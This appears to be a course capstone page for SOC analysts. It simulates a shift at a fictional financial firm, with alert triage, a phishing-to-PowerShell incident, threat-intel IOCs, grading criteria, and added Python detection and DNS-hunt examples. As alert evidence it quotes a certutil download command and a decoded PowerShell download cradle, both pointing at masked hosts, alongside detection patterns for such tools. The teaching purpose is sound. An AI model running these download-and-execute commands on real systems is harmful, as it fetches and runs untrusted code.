Opening Framing: Putting It All Together
Over the past eleven weeks, you've built a comprehensive foundation in security operations. You've learned monitoring, detection, triage, incident response, threat intelligence, hunting, and automation. Now it's time to apply everything in a realistic scenario.
This capstone simulates a day in a Security Operations Center. You'll handle an alert queue, investigate incidents, make decisions under pressure, document your work, and produce deliverables that demonstrate professional competency.
The scenario is designed to test not just individual skills, but your ability to integrate them—triaging efficiently, investigating thoroughly, responding appropriately, and communicating clearly.
Key insight: Real SOC work requires integrating many skills simultaneously. This capstone demonstrates that integration.
Capstone Scenario: Acme Financial Services
You're a SOC analyst at Acme Financial Services, a mid-sized financial institution. It's Monday morning, and you're starting your shift.
Organization Profile:
- 2,500 employees
- Headquarters + 12 branch offices
- Customer-facing web applications
- Internal trading systems
- Regulated industry (financial services)
Security Stack:
- SIEM: Splunk Enterprise Security
- EDR: CrowdStrike Falcon
- Firewall: Palo Alto Networks
- Email: Microsoft 365 with Defender
- SOAR: Splunk SOAR
Your Role:
- Tier 1/2 SOC Analyst
- Shift: 8 AM - 4 PM
- Responsibilities: Alert triage, investigation, escalation
Current Situation:
- Weekend was quiet (automated systems only)
- Several alerts accumulated overnight
- One ongoing investigation from Friday (handed off)
- Threat intel report about financial sector targeting
Part 1: Shift Handoff Review
Review the handoff from the previous shift:
SHIFT HANDOFF - Sunday Night to Monday Morning
Analyst: Sarah Chen
Time: 2024-01-14 23:45 UTC
OPEN INCIDENTS:
INC-2024-0112: Suspicious PowerShell Activity
- Status: Under investigation
- Host: TRADE-WS-07 (Trading floor workstation)
- User: mrodriguez (Senior Trader)
- Summary: EDR detected encoded PowerShell execution
- Actions taken:
* Alert triaged, escalated to Tier 2
* Memory dump collected
* User notified, asked not to use system
- Next steps: Malware analysis of memory dump
- Priority: HIGH
ALERT QUEUE STATUS:
- 23 alerts pending triage
- Oldest alert: 6 hours
- Mix of EDR, firewall, and email alerts
ENVIRONMENTAL NOTES:
- Patch Tuesday updates rolling out this week
- Trading systems maintenance window: Tuesday 2-4 AM
- New threat intel: APT targeting financial sector (see TI-2024-0115)
ITEMS FOR INCOMING ANALYST:
1. Continue INC-2024-0112 investigation
2. Review TI-2024-0115 and check for related IOCs
3. Clear alert backlog - prioritize by severity
Your Task:
- Review the handoff notes
- Prioritize your work for the shift
- Document your shift plan
Part 2: Alert Triage Queue
Your alert queue contains the following alerts. Triage each one.
Alert 1: Failed Login Attempts
ALERT: Multiple Failed Logins
Time: 2024-01-15 02:34 UTC
Source: Active Directory
Target: VPN Gateway
Account: svc_backup
Failures: 47 in 10 minutes
Source IPs: 185.220.101.XX (Tor exit node)
Status: Failures only, no success
Alert 2: Malware Detection
ALERT: Malware Detected - Blocked
Time: 2024-01-15 05:12 UTC
Source: Email Gateway
Recipient: jthompson@acme-financial.com
Subject: "Invoice #INV-29481 - Urgent Payment Required"
Attachment: Invoice_29481.xlsm
Detection: Emotet dropper (macro-based)
Action: Blocked, quarantined
Alert 3: Unusual Data Transfer
ALERT: Large Outbound Data Transfer
Time: 2024-01-15 03:45 UTC
Source Host: FILESVR-02 (HR File Server)
Destination: 104.21.XX.XX (Cloudflare IP - file sharing service)
Size: 2.3 GB
Protocol: HTTPS
User Context: Unknown (service account)
Alert 4: Suspicious Process
ALERT: Suspicious Process Execution
Time: 2024-01-15 06:58 UTC
Host: ACCT-WS-22 (Accounting workstation)
User: dlee (Accounts Payable Clerk)
Process: certutil.exe -urlcache -f http://XX.XX.XX.XX/update.exe
Parent: outlook.exe
EDR Action: Blocked execution
Alert 5: Policy Violation
ALERT: Unauthorized Software Installation
Time: 2024-01-15 07:30 UTC
Host: MKT-WS-15 (Marketing workstation)
User: kpatel (Marketing Manager)
Software: TeamViewer (remote access tool)
Policy: Unauthorized remote access software
Your Task:
For each alert, document:
- Classification (TP, FP, BTP)
- Priority (P1-P5)
- Initial assessment
- Required actions
Part 3: Incident Investigation
Continue the investigation of INC-2024-0112 from the handoff:
INCIDENT: INC-2024-0112
Title: Suspicious PowerShell Activity - Trading Workstation
TIMELINE (from previous investigation):
- 2024-01-12 16:45: User mrodriguez received email with link
- 2024-01-12 16:47: User clicked link, downloaded document
- 2024-01-12 16:48: Document opened, macro executed
- 2024-01-12 16:48: PowerShell spawned with encoded command
- 2024-01-12 16:49: EDR detected and alerted
- 2024-01-12 16:52: Alert triaged, escalated
EVIDENCE COLLECTED:
- Memory dump from TRADE-WS-07
- Email with original link
- Downloaded document (quarantined)
- EDR telemetry export
DECODED POWERSHELL COMMAND:
IEX (New-Object Net.WebClient).DownloadString('http://185.XX.XX.XX/stage2.ps1')
ADDITIONAL FINDINGS (your investigation):
- stage2.ps1 performs system reconnaissance
- Attempts to query Active Directory
- Beacons to 185.XX.XX.XX:443 every 60 seconds
- No lateral movement detected (yet)
- User has access to trading applications and financial data
Your Task:
- Complete the investigation timeline
- Identify all IOCs
- Map to MITRE ATT&CK techniques
- Determine scope of compromise
- Recommend containment actions
- Write incident report
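Alert 4 (certutil launched from Outlook) and the decoded download cradle above are the behaviours a detection rule should capture, and the same logic is what the Sigma rules requested in Part 4 would express. The Python below is an added example, not course material or Acme telemetry: the event schema (Sysmon-style Image/ParentImage/CommandLine), the Office and LOLBin lists, the benign certutil event and the base64 placeholder are all assumptions made here.

```python
import re
from collections import namedtuple

# Fields follow the usual EDR process-creation schema (assumed, Sysmon-style).
ProcEvent = namedtuple("ProcEvent", "host user image parent cmdline")

# Constructed process-creation events (not real scenario telemetry): the first
# two mirror Alert 4 and INC-2024-0112; the third is benign certutil use.
SAMPLE_EVENTS = [
    ProcEvent("ACCT-WS-22", "dlee", r"C:\Windows\System32\certutil.exe",
              r"C:\Program Files\Microsoft Office\OUTLOOK.EXE",
              "certutil.exe -urlcache -f http://XX.XX.XX.XX/update.exe update.exe"),
    ProcEvent("TRADE-WS-07", "mrodriguez",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAo"),  # placeholder b64
    ProcEvent("IT-ADMIN-01", "svc_patch", r"C:\Windows\System32\certutil.exe",
              r"C:\Windows\System32\cmd.exe", "certutil.exe -verify -urlfetch server.cer"),
]

OFFICE_APPS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOADERS = {"certutil.exe", "powershell.exe", "mshta.exe", "bitsadmin.exe"}
CRADLE_RE = re.compile(r"-e(nc(odedcommand)?)?\b|downloadstring|invoke-expression|\biex\b", re.I)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def office_spawns_downloader(ev: ProcEvent) -> bool:
    # Sigma-style: ParentImage|endswith an Office app AND Image|endswith a LOLBin.
    return basename(ev.parent) in OFFICE_APPS and basename(ev.image) in DOWNLOADERS

def certutil_download(ev: ProcEvent) -> bool:
    # -urlcache with -f or -split writes remote content to disk; the legitimate
    # "-verify -urlfetch" certificate-chain check must not fire.
    args = ev.cmdline.lower().split()
    return (basename(ev.image) == "certutil.exe" and "-urlcache" in args
            and bool({"-f", "-split"} & set(args)))

def powershell_cradle(ev: ProcEvent) -> bool:
    # Encoded-command switch or an in-memory download cradle as in INC-2024-0112.
    return basename(ev.image) == "powershell.exe" and bool(CRADLE_RE.search(ev.cmdline))

RULES = [("Office app spawning download-capable LOLBin", "T1566.001/T1204.002", office_spawns_downloader),
         ("certutil used as a downloader", "T1105", certutil_download),
         ("PowerShell encoded command or download cradle", "T1059.001", powershell_cradle)]

def evaluate(events) -> list:
    """One (host, user, rule name, technique) tuple per rule that matches an event."""
    return [(ev.host, ev.user, name, tech)
            for ev in events for name, tech, pred in RULES if pred(ev)]
```

Running `evaluate(SAMPLE_EVENTS)` yields two hits for ACCT-WS-22 and two for TRADE-WS-07 and none for the admin host, which is the false-positive check you would want before shipping the rule.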
Part 4: Threat Intelligence Application
Review the new threat intelligence report:
THREAT INTELLIGENCE REPORT: TI-2024-0115
Title: FIN7 Campaign Targeting Financial Services
Classification: TLP:AMBER
Date: 2024-01-14
SUMMARY:
FIN7 threat group observed conducting active campaign against
financial services organizations in North America. Campaign
uses spearphishing with macro-enabled documents targeting
finance and trading departments.
TTPs OBSERVED:
- Initial Access: Spearphishing Attachment (T1566.001)
- Execution: PowerShell (T1059.001)
- Persistence: Scheduled Task (T1053.005)
- C2: Web Service (T1102)
IOCs:
IPs:
- 185.234.72.XX
- 91.219.236.XX
- 45.142.213.XX
Domains:
- secure-docs[.]finance
- invoice-portal[.]net
- payment-update[.]com
Hashes (SHA256):
- a1b2c3d4e5f6... (dropper)
- f6e5d4c3b2a1... (stage2)
RECOMMENDATIONS:
- Block IOCs at perimeter
- Hunt for related activity
- Brief high-risk users
- Increase monitoring of finance/trading systems
Your Task:
- Check if IOCs match INC-2024-0112
- Hunt for IOCs across environment
- Recommend detection rules
- Draft user awareness communication
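The domains in TI-2024-0115 are defanged, so hunting for them means refanging first and then matching whole domains (including subdomains) rather than substrings. The script below is an added example, not part of the course or Acme's tooling: the DNS resolver log lines and their format are constructed here and imply nothing about the scenario's answer; the masked IPs and truncated hashes in the report cannot be hunted until the full values are available, so only the domains are used.

```python
from collections import Counter

# Domains exactly as listed in TI-2024-0115, in defanged form.
TI_DOMAINS_DEFANGED = ["secure-docs[.]finance", "invoice-portal[.]net", "payment-update[.]com"]

# Constructed DNS resolver log lines (not Acme's real logs); assumed format:
# "<date> <time> <client-host> <query-name> <record-type>".
DNS_LOG = """\
2024-01-15 07:02:11 TRADE-WS-07 secure-docs.finance A
2024-01-15 07:02:12 TRADE-WS-07 cdn.secure-docs.finance A
2024-01-15 07:05:40 ACCT-WS-22 login.microsoftonline.com A
2024-01-15 07:09:03 ACCT-WS-22 invoice-portal.net A
2024-01-15 07:11:57 MKT-WS-15 www.teamviewer.com A
2024-01-15 07:15:20 HR-WS-03 payment-update.com.example.org A
"""

def refang(ioc: str) -> str:
    """Turn defanged 'a[.]b' / 'hxxp://' notation back into a matchable value."""
    return ioc.replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http").lower()

def domain_matches(query: str, ioc_domain: str) -> bool:
    # Match the IOC domain itself or any subdomain of it, but not a look-alike
    # where the IOC only appears as a left-hand label of an unrelated domain.
    q = query.lower().rstrip(".")
    return q == ioc_domain or q.endswith("." + ioc_domain)

def hunt_dns(log_text: str, defanged_iocs) -> list:
    """Return (timestamp, host, query, matched IOC) for every hit in the log."""
    iocs = [refang(d) for d in defanged_iocs]
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # skip malformed lines rather than abort the hunt
        ts, host, query = f"{parts[0]} {parts[1]}", parts[2], parts[3]
        for ioc in iocs:
            if domain_matches(query, ioc):
                hits.append((ts, host, query, ioc))
    return hits

def hosts_to_scope(hits) -> Counter:
    """IOC resolutions per host; the input to the scope assessment."""
    return Counter(h[1] for h in hits)
```

The last log line is deliberately a look-alike that a naive substring search would flag; `domain_matches` ignores it, which keeps the hunt output defensible in the incident report.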
Part 5: Deliverables
Your capstone submission must include:
1. Shift Plan (10 points)
- Prioritized task list for the shift
- Rationale for prioritization
- Time allocation
2. Alert Triage Report (20 points)
- Classification for each of 5 alerts
- Priority assignment with justification
- Required actions for each
- Any correlations identified
3. Incident Investigation Report (30 points)
- Executive summary
- Complete timeline
- ATT&CK mapping
- IOC list
- Scope assessment
- Containment recommendations
- Lessons learned
4. Threat Intelligence Response (20 points)
- IOC comparison analysis
- Hunt queries used/recommended
- Detection rules (Sigma format preferred)
- User awareness draft
5. Shift Handoff Notes (10 points)
- Summary for next analyst
- Open items and status
- Recommendations
6. Reflection (10 points)
- What went well
- What was challenging
- What you would do differently
- How this connects to real SOC work
Evaluation Criteria
Your capstone will be evaluated on:
| Criteria | Points |
|---|---|
| Triage Accuracy: Correct classifications and priorities | 20 |
| Investigation Depth: Thorough analysis with evidence | 25 |
| Threat Intel Application: Effective use of intelligence | 15 |
| Documentation Quality: Clear, complete, professional | 20 |
| Decision Making: Sound judgment in recommendations | 10 |
| Reflection Quality: Thoughtful self-assessment | 10 |
Total: 100 points. Projects scoring 80+ demonstrate job-ready competency.
Tips for Success
Time Management:
- Allocate time before starting
- Don't get stuck on one alert
- Leave time for documentation
Prioritization:
- High impact + high confidence = highest priority
- Consider business context
- Document your reasoning
Investigation:
- Follow the evidence
- Don't assume—verify
- Map to ATT&CK as you go
Documentation:
- Write as you work, not after
- Be specific and factual
- Include evidence for conclusions
Professionalism:
- Write for your audience
- Be clear and concise
- Proofread before submission
Week 12 Outcome Check
By completing this capstone, you will have demonstrated:
- Alert triage and prioritization skills
- Investigation methodology
- Incident documentation
- Threat intelligence application
- Communication skills (technical and executive)
- Professional judgment and decision-making
Congratulations! Completing this capstone demonstrates you have the skills expected of an entry-level SOC analyst.
🛡️ Capstone Extension: Harden & Defend
Enterprise SOCs do more than investigate. They harden systems, deploy detection, and document baselines for future response.
- Apply CIS Level 1 hardening to one Windows and one Linux host
- Define a baseline of expected services and processes
- Plan SIEM + EDR coverage for critical systems
- Create a short runbook for baseline drift and alerts
Deliverable: Hardening checklist + monitoring plan + runbook summary.
🎯 Hands-On Labs (Free & Essential)
Run a full SOC simulation before moving to reading resources.
🎮 TryHackMe: SOC Level 1
What you'll do: Triage alerts, investigate evidence, and make response decisions.
Why it matters: This mirrors day-to-day SOC analyst work.
Time estimate: 2-3 hours
📝 Lab Exercise: SOC Shift Report
Task: Produce a shift report with triage log, incident timeline, and executive summary.
Deliverable: One report that combines findings, actions, and recommendations.
Why it matters: Clear reporting is as critical as the investigation.
Time estimate: 1.5-2 hours
🎮 TryHackMe: SOC Level 2 (Stretch)
What you'll do: Tackle harder scenarios with deeper investigation steps.
Why it matters: Stretching here prepares you for real-world escalation.
Time estimate: 2-3 hours
🛡️ Lab: Hardening + Monitoring Extension
What you'll do: Complete the hardening and monitoring tasks defined above.
Deliverable: Baseline checklist + SIEM/EDR coverage plan + runbook summary.
Why it matters: Strong baselines reduce alert noise and improve response speed.
Time estimate: 2-3 hours
💡 Lab Tip: Treat documentation as part of the response, not an afterthought.
Resources
Reference these resources as you complete your capstone.
- MITRE ATT&CK Framework · Reference · 50 XP · Resource ID: csy201_w12_r1 (Required)
- Sigma Rules Repository · Reference · 25 XP · Resource ID: csy201_w12_r2 (Optional)
- SANS Security Posters (Investigation Reference) · Reference · 25 XP · Resource ID: csy201_w12_r3 (Optional)
Week 12 Quiz
Test your understanding of SOC workflow integration and capstone decision-making.
Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.
Final Reflection
Reflection Prompt (400-500 words):
This capstone represents the culmination of your security operations journey in CSY201. You've progressed from understanding SOC concepts to performing analyst work in a realistic scenario.
Reflect on these questions:
- Compare your understanding of SOC work now versus Week 1. What aspects are clearer? What remains challenging?
- Which skills from this course do you feel most confident in? Which areas need more development?
- How did the capstone scenario compare to your expectations of SOC work? What surprised you?
- What would you do differently if you could repeat the capstone?
- Where do you want to specialize in security operations? (Detection engineering, threat hunting, incident response, automation, etc.)
A strong final reflection will honestly assess your growth, identify areas for continued learning, and articulate your career direction.
What's Next?
Completing CSY201 opens doors to specialized security topics:
- CSY202 - Ethical Hacking: Penetration testing methodology and techniques
- CSY203 - Web Application Security: OWASP Top 10, web vulnerabilities, secure development
- CSY204 - Digital Forensics: Evidence collection, analysis, and investigation
- CSY205 - Cloud Security: Securing AWS, Azure, and GCP environments
Certifications to Consider:
- CompTIA CySA+ (Cybersecurity Analyst)
- GIAC GSOC (Security Operations Certified)
- Splunk Core Certified User
- Blue Team Level 1 (BTL1)
Congratulations on completing CSY201! You now have a solid foundation in security operations—one of the most in-demand areas of cybersecurity. SOC skills are immediately applicable and highly valued. The monitoring, detection, investigation, and response capabilities you've developed will serve you throughout your security career. Keep learning, keep practicing, and welcome to the blue team!